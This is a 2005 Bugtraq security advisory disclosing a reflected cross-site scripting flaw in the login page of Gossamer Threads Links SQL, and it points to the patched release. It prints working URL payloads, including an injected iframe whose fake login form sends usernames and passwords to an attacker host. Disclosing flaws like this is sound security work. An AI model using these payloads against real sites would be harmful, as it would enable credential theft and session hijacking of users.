Gossamer Threads Links SQL login XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Gossamer Threads Links SQL login XSS Vulnerability
From: Nathan House <nhouse@xxxxxxxxxxxx>
Date: 4 May 2005 09:12:02 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


Gossamer Threads Links SQL login XSS Vulnerability

Class 
Input Validation XSS

Remote  Local   Published / Updated
Yes     Yes     04th May 2005

Vulnerable
Vulnerable: Gossamer Threads Links SQL v3.0
   + Links SQL 2.x
   + Links SQL 2.2.x
   + Links SQL 3.0


Not Vulnerable
-

Discussion
Links SQL is a perl/mod_perl/PHP web application written by Gossamer Threads 
and is used to build any type of directory. Although designed to manage links, 
Links SQL is very customisable and is used all over the Internet for a wide 
range of tasks such as Image Galleries, Press Releases, Yellowpages, Company 
Directories, and other categorised databases. 

The URL variable in the Gossamer Threads Links SQL login page (user.cgi) is a 
hidden field in the login form and can be passed directly to user.cgi in the 
form of user.cgi?url="xyz"
The URL variable is client side input created by the browser when a user clicks 
on a link which requires authentication.
After authentication the user is redirected to the URL in the URL variable. 
This URL variable does not sufficiently validate the client side input and is 
therefore vulnerable to script injection and cross site scripting (XSS) 
attacks. 


Exploit
This is a standard XSS vulnerability.

Note an attacker would normally obfuscate the linking code but for these 
examples I have made it simple for the sake of understanding.

Simple Example 1 (Pop up)
/user.cgi?url=">&lt;script&gt;alert("XSS 
Vulnerability")&lt;/script&gt;<"&from=rate

Resulting in the following within the HTML being injected:
<input type="hidden" name="url" value="">&lt;script&gt;alert("XSS 
Vulnerability")&lt;/script&gt;<"" />


Simple Example 2 (iframe to steal username and password)
/user.cgi?url="><iframe%20src="http://www.stationx.net/linksql.html"%20scrolling="No"%20align="MIDDLE"%20width="100%"%20height="3000"%20frameborder="No";></iframe><!--&from=rate


Example 2 produces an invisible iframe presenting a fake login screen to 
collect usernames and passwords with the following HTML injected;
<form action="http://hacker.com/getusernameandpassword.cgi"; method="post">

The &lt;script&gt; content is limited by the imagination of the attacker and 
the above are just two examples.

Like all XSS vulnerabilities this is a user attack only and not an attack on 
the system (Links SQL). Although if the user happens to be the links sql 
moderator/admin this user attack could be used to escalate privilege to then 
attack links sql.

To exploit this XSS vulnerability the victim must be tricked into making the 
above or other carefully crafted HTTP request. There are several ways users can 
be tricked to do this but common methods include via a link in an HTML aware 
email, a web based forum (Gossamer Threads forum) or embedded in a malicious 
web page.

XSS attacks are often demonstrated harvesting cookies to perform session 
hijacking and gather other sensitive information.


Solution
A new release has been created to fix this problem. Upgrade to Gossamer Links 
3.0.1

http://www.gossamer-threads.com/forum/Gossamer_Links_3.0.1_Released_P280986/

http://gossamer-threads.com/perl/gforum/gforum.cgi?post=281029;


Credit
Nathan House @ StationX


References
http://www.stationx.net
http://www.stationx.net/advisories.php
http://www.gossamer-threads.com/scripts/links-sql/index.htm




Legal Notice
Copyright (©) 2005 StationX (UK) ltd. Referred to as ?StationX? further more.
This advisory written by StationX can be distributed freely electronically 
without permission from StationX. This advisory may not be altered without the 
express written permission of StationX. If you wish to print this advisory 
whole or in part in any none electronic form please contact StationX for 
consent.

Disclaimer
This advisory to the best of our knowledge and given current information is 
correct and accurate at the date given above ?Published / Updated?.  Use of any 
information in this advisory is for informational purposes only to help further 
the development of the security industry and help further secure systems. The 
information in the advisory should NOT be used adversely. StationX, the author 
and any publishers gives no guarantees or warranties at all with regards to any 
information in this advisory. Under no circumstances shall StationX, the author 
and any publishers be liable in contract, tort, or otherwise, for any loss or 
damage whatsoever arising from use of or in any way connected with this 
advisory or any hyperlinked website, including, without limitation, damages for 
loss of business, loss of profits, business interruption, loss of business 
information, loss of programs or other data on the user's information handling 
system or otherwise maintained, or any other pecuniar
 y loss (even where StationX, the author and any publishers has been advised of 
the possibility of such loss or damage arising).

Prev by Date: iDEFENSE Security Advisory 05.03.05: Mac OS X Server NeST -target Buffer Overflow Vulnerability
Next by Date: Multiple vulnerabilities in Merak Mail Server 8.0.3 with Icewarp Web Mail 5.4.2
Previous by thread: iDEFENSE Security Advisory 05.03.05: Mac OS X Server NeST -target Buffer Overflow Vulnerability
Next by thread: Multiple vulnerabilities in Merak Mail Server 8.0.3 with Icewarp Web Mail 5.4.2
Index(es):
- Date
- Thread